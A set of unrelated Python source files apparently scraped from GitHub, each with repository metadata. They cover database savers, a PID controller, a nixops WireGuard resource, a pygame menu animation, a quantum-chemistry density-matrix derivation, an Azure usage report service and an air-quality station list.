    :param detail: Identifying value (url/domain/id) for error reporting.
    :return: Always True.
    """
    try:
        db_manager.session.add(entity)
        db_manager.session.commit()
    except exc.SQLAlchemyError as e:
        db_manager.handel_exception(e, True, op_name, detail)
    return True


def save_page_to_db(page):
    """Persist a page row; errors are reported against page.url."""
    return _commit_entity(page, 'save_page', page.url)


def save_site_to_db(site):
    """Persist a site row; errors are reported against site.domain."""
    return _commit_entity(site, 'save_site', site.domain)


def save_link_to_db(link):
    """Persist a link row; errors are reported against link.to_page."""
    return _commit_entity(link, 'save_link', link.to_page)


def save_image_to_db(image):
    """Persist an image row; errors are reported against image.url."""
    return _commit_entity(image, 'save_image', image.url)


def save_page_image_to_db(page_image):
    """Persist a page<->image association row."""
    return _commit_entity(page_image, 'save_page_image', page_image.image_id)


def save_page_data_to_db(page_data):
    """Persist a page-data row."""
    return _commit_entity(page_data, 'save_page_data', page_data.page_id)
### saving documents
def save_documents_to_db(doc_array, page_id):
    """Persist every document found on a page (stub pipeline)."""
    for document in doc_array:
        save_document_to_db(document, page_id)
    return True


def save_document_to_db(url, page_id):
    """Placeholder: document persistence is not implemented yet."""
    return True
### saving images
def save_images_to_db(img_array, page_id):
    # NOTE(review): this loops over images but calls save_document_to_db,
    # which looks like a copy-paste from save_documents_to_db -- confirm
    # whether an image-specific saver was intended here.
    for img in img_array:
        save_document_to_db(img, page_id)
    return True
| lavrinec/GOV-Crawler | crawler/src/savers.py | savers.py | py | 1,893 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "src.db_manager.session.add",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "src.db_manager.session",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "src.db_manager",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "sr... |
36224024372 | from pathlib import Path
import shelve
class PID():
    """Two-channel PID temperature controller with settle detection.

    Gains are loaded from a ``shelve`` config file; controller 2 uses the
    ``kp2``/``ki2``/``kd2`` keys and shares state via swap_controller().
    """

    # Base directory of the controller project (not used inside this class).
    P = Path('C:\\', 'Users', 'leouh', 'Documents', 'Rb_Controller')

    def __init__(self):
        with shelve.open('config') as config:
            self.cfg = dict(config)
        self.Ts = 1 / self.cfg['freq']
        if self.cfg['ki']:
            self.taui = self.cfg['kp'] / self.cfg['ki']
        self.taud = self.cfg['kd'] / self.cfg['kp']

    # Class-level defaults; writes through ``self`` shadow them per instance.
    integral_error = 0
    integral_error2 = 0
    prev_t = 0
    prev_t2 = 0
    upper_lim = 28
    lower_lim = 0
    settlecount = 0
    active_controller = 1

    def settle_update(self, t, t_target, error, slope):
        """Advance the settle counter while temperature is close and/or slow."""
        close_enough = error and abs(t_target - t) < self.cfg['max_fluctuations']
        slow_enough = slope and abs(t - self.prev_t) / self.Ts <= self.cfg['settle_slope']
        self.settlecount = self.settlecount + 1 if (close_enough or slow_enough) else 0

    def settle_check(self, slope, timed):
        """Return True once the settle counter exceeds the enabled threshold(s)."""
        if not (slope or timed):
            return False
        freq = self.cfg['freq']
        if slope and timed:
            return (self.settlecount > self.cfg['settle_wait_time'] * freq
                    or self.settlecount > self.cfg['slope_length'] * freq)
        if slope:
            return self.settlecount > self.cfg['slope_length'] * freq
        return self.settlecount > self.cfg['settle_wait_time'] * freq

    def swap_controller(self, to):
        """Switch the active controller, rescaling the integral state so the
        integral contribution stays continuous across the swap."""
        if to == self.active_controller:
            return
        if to == 1:
            self.integral_error = self.integral_error2 * self.cfg['ki2'] / self.cfg['ki']
        if to == 2:
            self.integral_error2 = self.integral_error * self.cfg['ki'] / self.cfg['ki2']
        self.active_controller = to

    # Simple PID controller. Explicitly dealing with wind-up.
    def update(self, t, t_target):
        """One PID step for controller 1; output clamped to [lower, upper]."""
        err = t_target - t
        out = (self.cfg['kp'] * err
               + self.cfg['ki'] * self.integral_error * self.Ts
               + self.cfg['kd'] * (t - self.prev_t) / self.Ts)
        self.prev_t = t
        # Anti-windup: only integrate while the raw output is unsaturated.
        if self.lower_lim < out < self.upper_lim:
            self.integral_error += err
        else:
            self.integral_error = 0
        return max(min(out, self.upper_lim), self.lower_lim)

    def update2(self, t, t_target):
        """One PID step for controller 2 (kp2/ki2/kd2 gains)."""
        err = t_target - t
        out = (self.cfg['kp2'] * err
               + self.cfg['ki2'] * self.integral_error2 * self.Ts
               + self.cfg['kd2'] * (t - self.prev_t2) / self.Ts)
        self.prev_t2 = t
        if self.lower_lim < out < self.upper_lim:
            self.integral_error2 += err
        else:
            self.integral_error2 = 0
        return max(min(out, self.upper_lim), self.lower_lim)
{
"api_name": "pathlib.Path",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "shelve.open",
"line_number": 7,
"usage_type": "call"
}
] |
75162791714 | # -*- coding: utf-8 -*-
# Automatic provisioning of wireguard keypair resources.
import nixops.util
import nixops.resources
import logging
from typing import Mapping, Optional, Sequence
logger = logging.getLogger(__name__)
class WgKeypairOptions(nixops.resources.ResourceOptions):
    """Definition of wireguard keypair options.

    Field names mirror the camelCase nix option names; they are copied
    field-by-field into snake_case attributes by WgKeypairDefinition.
    """

    name: str
    enable: bool
    dns: Sequence[str]
    mtu: Optional[int]  # None leaves the interface MTU unspecified
    listenPort: int
    persistentKeepalive: Optional[int]
    usePresharedKey: bool
    syncState: bool
    interfaceName: str
    table: Optional[str]  # routing table name; None means unspecified
    preUp: str
    preDown: str
    postUp: str
    postDown: str
    baseIpv4: Mapping[str, int]
    addNoWgHosts: bool
class WgKeypairDefinition(nixops.resources.ResourceDefinition):
    """Definition of a wireguard keypair resource."""

    config: WgKeypairOptions

    @classmethod
    def get_type(cls) -> str:
        # Resource type name used by nixops for this resource kind.
        return "wg-keypair"

    @classmethod
    def get_resource_type(cls) -> str:
        # Attribute name under `resources.` in the deployment expression.
        return "wgKeypair"

    def __init__(self, name: str, config: nixops.resources.ResourceEval):
        super().__init__(name, config)
        # Copy each camelCase option into a snake_case attribute.
        self.kp_name: str = self.config.name
        self.enable: bool = self.config.enable
        self.dns: Sequence[str] = self.config.dns
        self.mtu: Optional[int] = self.config.mtu
        self.listen_port: int = self.config.listenPort
        self.keepalive: Optional[int] = self.config.persistentKeepalive
        self.use_psk: bool = self.config.usePresharedKey
        self.sync_state: bool = self.config.syncState
        self.interface_name: str = self.config.interfaceName
        self.table: Optional[str] = self.config.table
        self.pre_up: str = self.config.preUp
        self.pre_down: str = self.config.preDown
        self.post_up: str = self.config.postUp
        self.post_down: str = self.config.postDown
        self.base_ipv4: Mapping[str, int] = self.config.baseIpv4
        self.add_no_wg_hosts: bool = self.config.addNoWgHosts
class WgKeypairState(nixops.resources.ResourceState[WgKeypairDefinition]):
    """State of a wireguard keypair resource."""

    # Each attr_property persists its value in the nixops state store
    # under the given "wgKeypair.*" key (third argument is the stored type).
    kp_name: str = nixops.util.attr_property("wgKeypair.name", None, str)
    enable: bool = nixops.util.attr_property("wgKeypair.enable", False, bool)
    dns: Sequence[str] = nixops.util.attr_property("wgKeypair.dns", [], "json")
    mtu: Optional[int] = nixops.util.attr_property("wgKeypair.mtu", None, int)
    addr: str = nixops.util.attr_property("wgKeypair.addr", None, str)
    private: str = nixops.util.attr_property("wgKeypair.private", None, str)
    public: str = nixops.util.attr_property("wgKeypair.public", None, str)
    listen_port: int = nixops.util.attr_property("wgKeypair.listenPort", None, int)
    keepalive: Optional[int] = nixops.util.attr_property(
        "wgKeypair.keepalive", None, int
    )
    use_psk: bool = nixops.util.attr_property("wgKeypair.usePresharedKey", True, bool)
    psk: str = nixops.util.attr_property("wgKeypair.presharedKey", None, str)
    sync_state: bool = nixops.util.attr_property("wgKeypair.syncState", False, bool)
    interface_name: str = nixops.util.attr_property(
        "wgKeypair.interfaceName", None, str
    )
    table: Optional[str] = nixops.util.attr_property("wgKeypair.table", None, str)
    pre_up: str = nixops.util.attr_property("wgKeypair.preUp", "", str)
    pre_down: str = nixops.util.attr_property("wgKeypair.preDown", "", str)
    post_up: str = nixops.util.attr_property("wgKeypair.postUp", "", str)
    post_down: str = nixops.util.attr_property("wgKeypair.postDown", "", str)
    base_ipv4: Mapping[str, int] = nixops.util.attr_property(
        "wgKeypair.baseIpv4", {}, "json"
    )
    add_no_wg_hosts: bool = nixops.util.attr_property(
        "wgKeypair.addNoWgHosts", True, bool
    )

    @classmethod
    def get_type(cls) -> str:
        return "wg-keypair"

    def __init__(self, depl: nixops.deployment.Deployment, name: str, id):
        nixops.resources.ResourceState.__init__(self, depl, name, id)

    @property
    def resource_id(self) -> str:
        # The generated keypair name doubles as the resource id.
        return self.kp_name

    def get_definition_prefix(self) -> str:
        return "resources.wgKeypair."

    def create(
        self,
        defn: WgKeypairDefinition,
        check: bool,
        allow_reboot: bool,
        allow_recreate: bool,
    ) -> None:
        """Copy the definition into persisted state and mark the resource UP.

        The stored name is namespaced with the deployment uuid so keypairs
        from different deployments cannot collide.
        """
        self.kp_name = f"nixops-{self.depl.uuid}-{defn.name}"
        self.enable = defn.enable
        self.dns = defn.dns
        self.mtu = defn.mtu
        self.listen_port = defn.listen_port
        self.keepalive = defn.keepalive
        self.use_psk = defn.use_psk
        self.sync_state = defn.sync_state
        self.interface_name = defn.interface_name
        self.table = defn.table
        self.pre_up = defn.pre_up
        self.pre_down = defn.pre_down
        self.post_up = defn.post_up
        self.post_down = defn.post_down
        self.base_ipv4 = defn.base_ipv4
        self.add_no_wg_hosts = defn.add_no_wg_hosts
        self.state = self.UP

    def destroy(self, wipe: bool = False) -> bool:
        """Confirm with the user, warn that wipe is unsupported, and log
        the destruction; returns False when the user declines."""
        if not self.depl.logger.confirm(
            f"are you sure you want to destroy wireguard keypair resource (wg-link) ‘{self.name}’?"
        ):
            return False
        if wipe:
            self.warn("wipe is not supported")
        self.log(f"destroying {self.name} (resource id: {self.kp_name})...")
        return True
| input-output-hk/nixops-wg-links | nixops_wg_links/resources/wg_keypair.py | wg_keypair.py | py | 5,381 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "logging.getLogger",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "nixops.util.resources",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "nixops.util",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "typing.Seque... |
70173697953 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import argparse, codecs, sys
# Parseur de ligne de commande
# Command-line parser
parser = argparse.ArgumentParser(description="Sorts or inverts lines or characters from a file.")
parser.add_argument('-f', help="input file")
# only one of -l / -c is permitted
lorc = parser.add_mutually_exclusive_group()
lorc.add_argument('-l', help='line sort (default)', action='store_true')
lorc.add_argument('-c', help='character sort', action='store_true')
parser.add_argument('mode', help='either "sort" or "invert"')
args = parser.parse_args()

# Read the input file
lines = []
try:
    with codecs.open(args.f, 'r', encoding='utf8') as f:
        for line in f.readlines():
            # strip trailing newlines ahead of the optional sort
            lines.append(line.rstrip('\n'))
except IOError:
    sys.exit('Error: file not found')

# Operations on the text
# (when -c is given, each line is also sorted or inverted; the -l flag is
# never actually checked, but the user may pass it for clarity)
if args.mode == 'sort':
    # sort using Python's default ordering
    if args.c:
        for i in range(0, len(lines)):
            lines[i] = ''.join(sorted(lines[i]))
    lines.sort()
elif args.mode == 'invert':
    # inversion
    # (reversing explicitly is not the most efficient approach, but it is
    # clearer -- and 'sort' is far worse anyway!)
    if args.c:
        for i in range(0, len(lines)):
            lines[i] = lines[i][::-1]
    lines.reverse()
else:
    # if an invalid mode is given, the lines are left unmodified
    sys.exit("Error: unrecognized mode (must be either 'sort' or 'invert')")

# Output
for line in lines:
    sys.stdout.write(line+'\n')
{
"api_name": "argparse.ArgumentParser",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "codecs.open",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "sys.exit",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "sys.exit",
"line_numb... |
4516929724 | # Проанализировать зарплаты КМДА csv файлы за 2019 год найти средние минимальные максимальные построить график
import matplotlib.pyplot as plt
def get_data(filename):
    """Parse a KMDA salary export (';'-separated, UTF-8) into a dict.

    The header row is skipped; column 0 is the employee name and column 9
    the salary string like '1 234,56₴', which is normalized to a float.
    """
    salaries = {}
    with open(filename, 'r', encoding='utf8') as fh:
        fh.readline()  # skip the header row
        for raw in fh:
            fields = raw.rstrip().split(';')
            amount = fields[9].replace('₴', '').replace(' ', '').replace(',', '.')
            salaries[fields[0]] = float(amount)
    return salaries
def draw_diagram(data):
    """Render a bar chart of salaries keyed by employee name.

    Bar positions (and the matching x-tick positions) are now derived
    from the number of entries instead of a hard-coded list of nine,
    so the chart no longer breaks when the CSV has a different row count.

    :param data: mapping of employee name -> salary (see get_data).
    """
    positions = [i * 10 for i in range(len(data))]
    bar_width = 10
    plt.bar(positions, data.values(), bar_width, color=('r', 'g', 'b', 'm', 'k'))
    plt.xlabel('Сотрудник')
    plt.ylabel('Зарплата')
    plt.xticks(positions, data.keys())
    plt.xticks(rotation=90)
    plt.yticks([0, 5000, 10000, 15000, 20000, 25000, 30000, 35000, 40000, 45000])
    # Leave room for the rotated employee names below the axis.
    plt.subplots_adjust(bottom=0.4)
    plt.show()
if __name__ == '__main__':
    data = get_data('berezen-2019.csv')  # March 2019 payroll export
    salaries = data.values()
    # Summary statistics across all employees.
    max_salary = max(salaries)
    min_salary = min(salaries)
    average_salary = round(sum(salaries) / len(salaries), 2)
    print(max_salary, min_salary, average_salary)
    draw_diagram(data)
| su1gen/python-homework | lesson05HW/kmda/__main__.py | __main__.py | py | 1,344 | python | ru | code | 0 | github-code | 1 | [
{
"api_name": "matplotlib.pyplot.bar",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.xlabel",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "matp... |
30375203012 | from fractions import Fraction
from wick.index import Idx
from wick.operator import FOperator, Tensor
from wick.expression import Term, Expression, AExpression
from wick.wick import apply_wick
from wick.convenience import E1, E2, commute
# Occupied/virtual orbital index labels used throughout.
i = Idx(0, "occ")
a = Idx(0, "vir")
j = Idx(1, "occ")
b = Idx(1, "vir")

# CCSD cluster operator T = T1 + T2 and de-excitation operator L = L1 + L2.
T1 = E1("t", ["occ"], ["vir"])
T2 = E2("t", ["occ"], ["vir"])
T = T1 + T2
L1 = E1("L", ["vir"], ["occ"])
L2 = E2("L", ["vir"], ["occ"])
L = L1 + L2

# For each 1-RDM block, the similarity-transformed density operator is
# expanded with the BCH commutator series p + [p,T] + (1/2)[[p,T],T];
# the series is truncated after the double commutator here.

# ov block
operators = [FOperator(a, True), FOperator(i, False)]
pvo = Expression([Term(1, [], [Tensor([i, a], "")], operators, [])])
PT = commute(pvo, T)
PTT = commute(PT, T)
mid = pvo + PT + Fraction('1/2')*PTT
full = L*mid
out = apply_wick(full)
out.resolve()
final = AExpression(Ex=out)
print("P_{ov} = ")
print(final)

# vv block
operators = [FOperator(a, True), FOperator(b, False)]
pvv = Expression([Term(1, [], [Tensor([b, a], "")], operators, [])])
PT = commute(pvv, T)
PTT = commute(PT, T)
mid = pvv + PT + Fraction('1/2')*PTT
full = L*mid
out = apply_wick(full)
out.resolve()
final = AExpression(Ex=out)
final.sort_tensors()
print("P_{vv} = ")
print(final)

# oo block (note the -1 prefactor and swapped creation/annihilation roles)
operators = [FOperator(j, False), FOperator(i, True)]
poo = Expression([Term(-1, [], [Tensor([j, i], "")], operators, [])])
PT = commute(poo, T)
PTT = commute(PT, T)
mid = poo + PT + Fraction('1/2')*PTT
full = L*mid
out = apply_wick(full)
out.resolve()
final = AExpression(Ex=out)
final.sort_tensors()
print("P_{oo} = ")
print(final)

# vo block: unlike the other blocks, the bare (un-projected) term `mid`
# also contributes, hence `mid + L*mid`.
operators = [FOperator(i, True), FOperator(a, False)]
pvo = Expression([Term(1, [], [Tensor([a, i], "")], operators, [])])
PT = commute(pvo, T)
PTT = commute(PT, T)
mid = pvo + PT + Fraction('1/2')*PTT
full = mid + L*mid
out = apply_wick(full)
out.resolve()
final = AExpression(Ex=out)
final.sort_tensors()
print("P_{vo} = ")
print(final)
| awhite862/wick | examples/ccsd_1rdm.py | ccsd_1rdm.py | py | 1,831 | python | en | code | 14 | github-code | 1 | [
{
"api_name": "wick.index.Idx",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "wick.index.Idx",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "wick.index.Idx",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "wick.index.Idx",
"line... |
39998982074 | import unittest
import shutil
import tempfile
import os
import logging
logging.getLogger().setLevel(logging.ERROR)
import heppy.framework.context as context
if context.name != 'bare':
from simple_example_noindexing_cfg import config
from heppy.utils.debug_tree import create_tree, remove_tree
from heppy.framework.looper import Looper
from ROOT import TFile
@unittest.skipIf(context.name=='bare', 'ROOT not available')
class TestNoIndexing(unittest.TestCase):
    """Looper behaviour when the event backend does not support indexing."""

    def setUp(self):
        # Build a throwaway ROOT test tree and record its entry count.
        self.fname = create_tree()
        rootfile = TFile(self.fname)
        self.nevents = rootfile.Get('test_tree').GetEntries()
        self.outdir = tempfile.mkdtemp()

    def tearDown(self):
        shutil.rmtree(self.outdir)

    def test_all_events_processed(self):
        # Run over everything and cross-check the processed-event count
        # reported in log.txt against the looper's own counter.
        loop = Looper( self.outdir, config,
                       nEvents=None,
                       nPrint=0 )
        loop.loop()
        loop.write()
        logfile = open('/'.join([self.outdir, 'log.txt']))
        nev_processed = None
        for line in logfile:
            if line.startswith('number of events processed:'):
                nev_processed = int(line.split(':')[1])
        logfile.close()
        self.assertEqual(nev_processed, self.nevents)
        # checking the looper itself.
        self.assertEqual(loop.nEvProcessed, self.nevents)

    def test_skip(self):
        # Skipping the first N events should shrink the processed count.
        first = 10
        loop = Looper( self.outdir, config,
                       nEvents=None,
                       firstEvent=first,
                       nPrint=0 )
        loop.loop()
        loop.write()
        # input file has 200 entries
        # we skip 10 entries, so we process 190.
        self.assertEqual(loop.nEvProcessed, self.nevents-first)

    def test_process_event(self):
        '''Test that indeed, calling loop.process(iev) raises
        TypeError if the events backend does not support indexing.
        '''
        loop = Looper( self.outdir, config,
                       nEvents=None,
                       nPrint=0 )
        self.assertRaises(TypeError, loop.process, 10)


if __name__ == '__main__':
    unittest.main()
| cbernet/heppy | heppy/test/test_noindexing.py | test_noindexing.py | py | 2,161 | python | en | code | 9 | github-code | 1 | [
{
"api_name": "logging.getLogger",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "logging.ERROR",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "heppy.framework.context.name",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "h... |
28840367023 | # this class is meant to create a menu floater that moves across the screen vertically and in random positions
#importing librairies
import copy
import random
import pygame
import TestTubeGame
class Menu_Floater:
    """A decorative sprite that drifts vertically across the menu screen,
    spinning as it moves, and respawns at a random position once it has
    fully left the window."""

    def __init__(self, img, direction):
        self.image = img
        self.current_image = copy.copy(self.image)
        self.direction = direction
        self.angle = 0
        self.s = 1
        self.sp = 1
        self.reset()

    def reset(self):
        """Respawn at a random x with fresh random size, spin and speed."""
        self.x = random.randint(0, TestTubeGame.WIDTH - self.current_image.get_width())
        self.angle = 0
        self.s = random.randint(0, 5)
        self.sp = random.randint(1, 15)
        new_w = random.randint(int(TestTubeGame.WIDTH // 40), int(TestTubeGame.WIDTH // 20))
        new_h = random.randint(int(TestTubeGame.HEIGHT // 40), int(TestTubeGame.HEIGHT // 20))
        self.current_image = pygame.transform.scale(self.image, (new_w, new_h))
        # Start just off-screen on the side it will enter from.
        if self.direction:
            self.y = TestTubeGame.HEIGHT
        else:
            self.y = 0 - self.current_image.get_height()

    def move(self):
        """Step vertically: upward when direction is truthy, else downward."""
        self.y += -self.sp if self.direction else self.sp

    def spin(self):
        """Return the image rotated by the accumulated angle, then advance it."""
        rotated = pygame.transform.rotate(self.current_image, self.angle)
        self.angle += self.s
        return rotated

    def draw(self):
        """Blit, advance and recycle the floater for one frame."""
        TestTubeGame.WINDOW.blit(self.spin(), (self.x, self.y))
        self.move()
        self.overpass()

    def overpass(self):
        """Respawn once the sprite is entirely outside the window."""
        off_horizontal = self.x > TestTubeGame.WIDTH or self.x < 0
        off_vertical = (self.y < 0 - self.current_image.get_height()
                        or self.y > TestTubeGame.HEIGHT)
        if off_horizontal or off_vertical:
            self.reset()
| MiracleSheep/Python_Pygame_TestTubeGame | menu_floater.py | menu_floater.py | py | 1,851 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "copy.copy",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "TestTubeGame.WIDTH",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "random.randint",
... |
30209496323 | # LMGP Visualization
#
#
#
import numpy as np
import matplotlib.pyplot as plt
import torch
def plot_ls(model, constraints_flag = True):
    """Compute the 2-D latent-space positions of an LMGP model's
    categorical level combinations.

    :param model: fitted model exposing ``zeta``, ``perm``,
        ``num_levels_per_var`` and a callable ``nn_model``.
    :param constraints_flag: when True, canonicalize the positions via
        ``constrains`` before returning.
    :return: numpy array of latent positions.
    """
    #
    # plot latent values
    zeta = torch.tensor(model.zeta, dtype = torch.float64)
    #A = model.nn_model.weight.detach()
    # perm/levels are only used by the commented-out scatter plot below.
    perm = model.perm
    levels = model.num_levels_per_var
    #positions = torch.matmul(zeta, A.T) # this gives the position of each combination in latent space
    # `transform=lambda x: x` passes the raw output through unchanged.
    positions = model.nn_model(zeta, transform = lambda x: x) #3-torch.exp(x)
    # A >2-D output is averaged over its leading (sample) dimension.
    if positions.ndim > 2:
        positions = positions.mean(axis = 0)
    else:
        positions = positions.detach()
    # NOTE(review): this second ndim check looks unreachable, since the
    # branch above already reduced >2-D outputs -- confirm.
    if positions.ndim > 2:
        positions = positions.mean(axis = 0)
    # applying the constrains
    if constraints_flag:
        positions = constrains(positions)
    positions = positions.detach().numpy()
    # plt.rcParams.update({'font.size': 19})
    # fig,axs = plt.subplots(figsize=(8.5,6))
    # colors = {0:'blue', 1:'r', 2:'g', 3:'c', 4:'m', 5:'k', 6:'y'}
    # # loop over the number of variables
    # for j in range(len(levels)):
    #     for i in range(levels[j]):
    #         index = torch.where(perm[:,j] == i)
    #         col = list(map(lambda x: colors[x], np.ones(index[0].numpy().shape) * i))
    #         axs.scatter(positions[index][...,0], positions[index][...,1], label = 'level' + str(i+1), c = col)
    #         #axs.set_title('Variable ' + str(j), fontsize = 15)
    #         axs.set_xlabel(r'$z_1$', fontsize = 25)
    #         axs.set_ylabel(r'$z_2$', fontsize = 25)
    #         axs.legend()
    # tempxi = np.min(positions[...,0])-0.2 * (np.abs(np.min(positions[...,0])) +5)
    # tempxx = np.max(positions[...,0]) + 0.2 * (np.abs(np.max(positions[...,0])) +5)
    # tempyi = np.min(positions[...,1])-0.2 * (np.abs(np.min(positions[...,1])) +5)
    # tempyx = np.max(positions[...,1]) + 0.2 * (np.abs(np.max(positions[...,1])) +5)
    # axs.set_xlim(tempxi, tempxx)
    # axs.set_ylim(tempyi, tempyx)
    # #fig.tight_layout()
    # #plt.tight_layout()
    # #plt.autoscale()
    return positions
def constrains(z):
    """Canonicalize a latent embedding: translate the first point to the
    origin, mirror so the second point has non-negative x, then rotate so
    the second point lies on the x-axis."""
    z = z - z[0, :]
    if z[1, 0] < 0:
        z[:, 0] *= -1
    # Rotation angle that maps the second row onto the x-axis.
    theta = torch.atan(-1 * z[1, 1] / z[1, 0])
    rotation = torch.tensor([[torch.cos(theta), -1 * torch.sin(theta)],
                             [torch.sin(theta), torch.cos(theta)]])
    z = torch.matmul(rotation, z.T).T
    # NOTE(review): the guard checks the column count (shape[1] > 2) but
    # the flip reads z[2, 1] (third ROW) while the rotation above is
    # strictly 2x2 -- confirm the intended condition.
    if z.shape[1] > 2 and z[2, 1] < 0:
        z[:, 1] *= -1
    return z
| yiping514/LMGP | lmgp_pytorch/visual/plot_latenth_position.py | plot_latenth_position.py | py | 2,515 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "torch.tensor",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "torch.float64",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "torch.atan",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": "torch.tensor",
"line_n... |
4566035845 | from datetime import datetime, timedelta
import pandas as pd
from framework.configuration.configuration import Configuration
from framework.logger.providers import get_logger
from clients.azure_gateway_client import AzureGatewayClient
from clients.email_gateway_client import EmailGatewayClient
from domain.usage import ReportDateRange
from services.event_service import EventService
logger = get_logger(__name__)
def element_at(_list, index):
    """Return ``_list[index]``, or None when the index is out of range or
    the container does not support indexing (e.g. None).

    Narrowed from a bare ``except`` so unrelated errors (KeyboardInterrupt,
    SystemExit, genuine bugs) are no longer swallowed.
    """
    try:
        return _list[index]
    except (LookupError, TypeError):
        return None
# Subject prefix for the usage report email.
REPORT_EMAIL_SUBJECT = 'Azure Usage'
# Column the aggregated table is sorted by (descending).
REPORT_SORT_KEY = 'Cost'
# Columns pulled from the cost-management payload.
REPORT_COLUMNS = [
    'Cost',
    'CostUSD',
    'Currency',
    'Product'
]
# Grouping keys for the per-product cost rollup.
REPORT_GROUP_KEYS = [
    'Product',
    'Currency'
]
class UsageService:
    """Builds and emails Azure cost-management usage reports."""

    def __init__(
        self,
        configuration: Configuration,
        email_client: EmailGatewayClient,
        azure_client: AzureGatewayClient,
        event_service: EventService
    ):
        self.__email_client = email_client
        self.__azure_client = azure_client
        self.__event_service = event_service
        # Report recipient comes from the 'azure_usage' config section.
        self.__recipient = configuration.azure_usage.get('recipient')

    def __format_date(self, date):
        # ISO-style yyyy-mm-dd strings for the Azure client.
        return date.strftime('%Y-%m-%d')

    async def send_cost_management_report(
        self,
        range_key: str
    ) -> dict:
        """Fetch cost data for the requested range, aggregate per
        product/currency, and dispatch it as a datatable email event.

        :param range_key: range selector (None, 'days_N', month-to-date
            or year-to-date; see __get_date_range).
        :return: dict with the aggregated 'table' rows.
        """
        logger.info(f'Generating usage report')
        start_date, end_date = self.__get_date_range(
            range_key=range_key)
        logger.info(f'Range: {start_date} to {end_date}')
        content = await self.__azure_client.get_cost_management_data(
            start_date=start_date,
            end_date=end_date)
        data = content.get('data')
        # Sum costs per (Product, Currency) pair, highest cost first.
        df = pd.DataFrame(data)[REPORT_COLUMNS]
        df = (df
              .groupby(
                  by=REPORT_GROUP_KEYS,
                  as_index=False)
              .sum())
        df = df.sort_values(
            by=REPORT_SORT_KEY,
            ascending=False)
        table = df.to_dict(
            orient='records')
        logger.info('Sending datatable email gateway request')
        event_request, endpoint = self.__email_client.get_datatable_email_request(
            recipient=self.__recipient,
            subject=f'{REPORT_EMAIL_SUBJECT}: {range_key}',
            data=table)
        await self.__event_service.dispatch_email_event(
            endpoint=endpoint,
            message=event_request.to_dict())
        return {'table': table}

    def __get_date_range(
        self,
        range_key: str
    ):
        """Resolve a range key to a (start, end) pair of date strings.

        Supported keys: None (today only), 'days_N' (last N days),
        month-to-date and year-to-date (see ReportDateRange).

        :raises Exception: on malformed 'days_N' keys or unknown keys.
        """
        logger.info(f"Parsing range for date range type: '{range_key}'")
        now = datetime.utcnow()
        if range_key is None:
            logger.info(f'Returning default report date range')
            return (
                self.__format_date(now),
                self.__format_date(now)
            )
        if range_key.startswith(ReportDateRange.LastNDays):
            # Key format: '<prefix>_<n>' where n is the day count.
            days = element_at(range_key.split('_'), 1)
            if days is None:
                raise Exception("Range key must be in the format 'days_n'")
            if not days.isdigit():
                raise Exception("Range day parameter is not of type 'int'")
            return (
                self.__format_date(now - timedelta(days=int(days))),
                self.__format_date(now)
            )
        if range_key == ReportDateRange.MonthToDate:
            start = datetime(
                year=now.year,
                month=now.month,
                day=1)
            return (
                self.__format_date(start),
                self.__format_date(now)
            )
        if range_key == ReportDateRange.YearToDate:
            start = datetime(
                year=now.year,
                month=1,
                day=1)
            return (
                self.__format_date(start),
                self.__format_date(now)
            )
        raise Exception(f"'{range_key}' is not a valid report date range key")
| danleonard-nj/kube-tools-api | services/kube-tools/services/usage_service.py | usage_service.py | py | 3,969 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "framework.logger.providers.get_logger",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "framework.configuration.configuration.Configuration",
"line_number": 40,
"usage_type": "name"
},
{
"api_name": "clients.email_gateway_client.EmailGatewayClient",
"... |
21448529472 | import datetime as dt
from dateutil import parser
import os
import pandas as pd
import numpy as np
from scipy import interpolate
from matplotlib import mlab
from selenium import webdriver
import bs4
from timeout import timeout
class DECStation:
    """A single NY DEC air-quality monitoring station."""

    def __init__(self, number, name, lon, lat):
        self.number = number  # ST_ID used by nyaqinow.net
        self.name = name
        self.lon = lon
        self.lat = lat

    def get_station_url(self):
        """Build this station's nyaqinow.net fast-report URL."""
        return 'http://www.nyaqinow.net/StationReportFast.aspx?&ST_ID=%s' % self.number
def get_stations():
    """Return the NY DEC monitoring stations keyed by display name.

    Station numbers are the ST_ID values used by nyaqinow.net; lon/lat
    are the station coordinates.
    """
    all_stations = {
        #DEC group 1
        #Long Island
        'Babylon': DECStation(46, 'Babylon', -73.41919, 40.74529),
        'Eisenhower Park': DECStation(53, 'Eisenhower Park', -73.58549, 40.74316),
        'Suffolk County': DECStation(36, 'Suffolk County', -73.05754, 40.82799),
        #DEC group 2
        #Manhattan
        'CCNY': DECStation(73, 'CCNY', -73.94825, 40.81976),
        'IS 143': DECStation(56, 'IS 143', -73.93059, 40.84888),
        'PS 19': DECStation(75, 'PS 19', -73.98446, 40.73000),
        'Division Street': DECStation(60, 'Division Street', -73.99518, 40.71436),
        #Staten Island
